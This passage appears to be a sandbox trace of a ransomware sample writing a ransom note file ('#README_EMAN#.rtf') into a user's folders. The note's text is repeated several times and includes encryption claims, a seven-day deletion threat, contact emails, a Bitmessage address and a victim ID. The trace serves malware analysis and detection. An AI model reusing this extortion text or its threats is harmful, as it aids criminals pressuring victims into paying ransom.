g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fs\x07", lpUsedDefaultChar=0x0) returned 8717 [0295.441] WriteFile (in: hFile=0x228, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.441] CloseHandle (hObject=0x228) returned 1 [0295.441] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\#readme_eman#.rtf")) returned 0xffffffff [0295.441] GetLastError () returned 0x2 [0295.441] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0295.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 